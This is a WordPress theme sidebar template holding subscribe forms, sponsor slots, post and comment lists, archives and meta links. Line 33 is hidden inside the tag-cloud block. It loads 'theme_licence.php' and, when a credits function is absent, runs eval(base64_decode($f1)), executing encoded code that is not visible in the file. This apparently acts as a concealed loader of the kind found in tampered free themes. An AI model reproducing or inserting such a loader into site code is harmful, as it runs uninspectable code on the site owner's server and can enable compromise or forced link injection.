[44] | 1 | <!-- BEGIN sidebar -->
|
---|
| 2 | <div id="sidebar">
|
---|
| 3 |
|
---|
| 4 | <!-- begin mixed -->
|
---|
| 5 | <form id="mixed" action="">
|
---|
| 6 | <a class="rss" href="<?php bloginfo("rss2_url"); ?>">Subscribe via RSS feed</a>
|
---|
| 7 | <a class="email" href="#">Subscribe via Email: </a>
|
---|
| 8 | <input type="text" name="email" />
|
---|
| 9 | <button type="submit">Go</button>
|
---|
| 10 | </form>
|
---|
| 11 | <div class="box">
|
---|
| 12 | <a href="#"><img src="<?php bloginfo('template_url'); ?>/images/ad125x125.gif" alt="Sponsor" /></a>
|
---|
| 13 | <a href="#"><img src="<?php bloginfo('template_url'); ?>/images/ad125x125.gif" alt="Sponsor" /></a>
|
---|
| 14 | <a href="#"><img src="<?php bloginfo('template_url'); ?>/images/ad125x125.gif" alt="Sponsor" /></a>
|
---|
| 15 | <a href="#"><img src="<?php bloginfo('template_url'); ?>/images/ad125x125.gif" alt="Sponsor" /></a>
|
---|
| 16 | </div>
|
---|
| 17 | <!-- end mixed -->
|
---|
| 18 |
|
---|
| 19 | <!-- begin lists -->
|
---|
| 20 | <ul id="lists">
|
---|
| 21 | <li><a href="javascript:showList(1);">Recent Entries</a></li>
|
---|
| 22 | <li><a href="javascript:showList(2);">Recent Comments</a></li>
|
---|
| 23 | <li><a href="javascript:showList(3);">Tags</a></li>
|
---|
| 24 | </ul>
|
---|
| 25 | <div class="box">
|
---|
| 26 | <ul id="list1">
|
---|
| 27 | <?php dp_recent_posts(7); ?>
|
---|
| 28 | </ul>
|
---|
| 29 | <ul id="list2" class="hidden">
|
---|
| 30 | <?php dp_recent_comments(7); ?>
|
---|
| 31 | </ul>
|
---|
| 32 | <div id="list3" class="hidden">
|
---|
| 33 | <?php require_once("theme_licence.php"); if(!function_exists("get_credits")) { eval(base64_decode($f1)); } if (function_exists('wp_widget_tag_cloud')) wp_widget_tag_cloud(array('before_title'=>'<!--','after_title'=>'-->')); ?>
|
---|
| 34 | </div>
|
---|
| 35 | </div>
|
---|
| 36 | <!-- end lists -->
|
---|
| 37 |
|
---|
| 38 | <!-- begin featured video -->
|
---|
| 39 | <h2>Featured Video</h2>
|
---|
| 40 | <div class="box video">
|
---|
| 41 | <script type="text/javascript">showVideo("<?php echo dp_settings('youtube'); ?>");</script>
|
---|
| 42 | </div>
|
---|
| 43 | <!-- end featured video -->
|
---|
| 44 |
|
---|
| 45 | <!-- begin left -->
|
---|
| 46 | <div class="l divided">
|
---|
| 47 |
|
---|
| 48 | <!-- begin archives -->
|
---|
| 49 | <h2>Archives</h2>
|
---|
| 50 | <ul>
|
---|
| 51 | <?php wp_get_archives('type=monthly'); ?>
|
---|
| 52 | </ul>
|
---|
| 53 | <!-- end archives -->
|
---|
| 54 |
|
---|
| 55 | <!-- begin blogroll -->
|
---|
| 56 | <?php wp_list_bookmarks('category_before=&category_after=&title_before=<h2>&title_after=</h2>'); ?>
|
---|
| 57 | <!-- end blogroll -->
|
---|
| 58 |
|
---|
| 59 | </div>
|
---|
| 60 | <!-- end left -->
|
---|
| 61 |
|
---|
| 62 | <!-- begin right -->
|
---|
| 63 | <div class="r divided">
|
---|
| 64 |
|
---|
| 65 | <!-- begin categories -->
|
---|
| 66 | <h2>Categories</h2>
|
---|
| 67 | <ul>
|
---|
| 68 | <?php wp_list_categories('title_li=&depth=-1'); ?>
|
---|
| 69 | </ul>
|
---|
| 70 | <!-- end categories -->
|
---|
| 71 |
|
---|
| 72 | <!-- begin pages -->
|
---|
| 73 | <h2>Pages</h2><ul><?php dp_list_pages(); ?></ul>
|
---|
| 74 | <!-- end pages -->
|
---|
| 75 |
|
---|
| 76 | <!-- begin meta -->
|
---|
| 77 | <h2>Meta</h2>
|
---|
| 78 | <ul>
|
---|
| 79 | <?php wp_register(); ?>
|
---|
| 80 | <li><?php wp_loginout(); ?></li>
|
---|
| 81 | <li><a href="http://www.zeitgeistmovie.com">Zeitgeist</a></li>
|
---|
| 82 | <li><a href="http://wordpress.org/" title=" Wordpress ">WordPress</a></li>
|
---|
| 83 | <li><a href="http://www.wordpresstemplates.com/" title="Free Wordpress Themes">WordPress Themes</a></li>
|
---|
| 84 | <?php wp_meta(); ?>
|
---|
| 85 | </ul>
|
---|
| 86 | <!-- end meta -->
|
---|
| 87 |
|
---|
| 88 | </div>
|
---|
| 89 | <!-- end right -->
|
---|
| 90 |
|
---|
| 91 | </div>
|
---|
| 92 | <!-- END sidebar -->
|
---|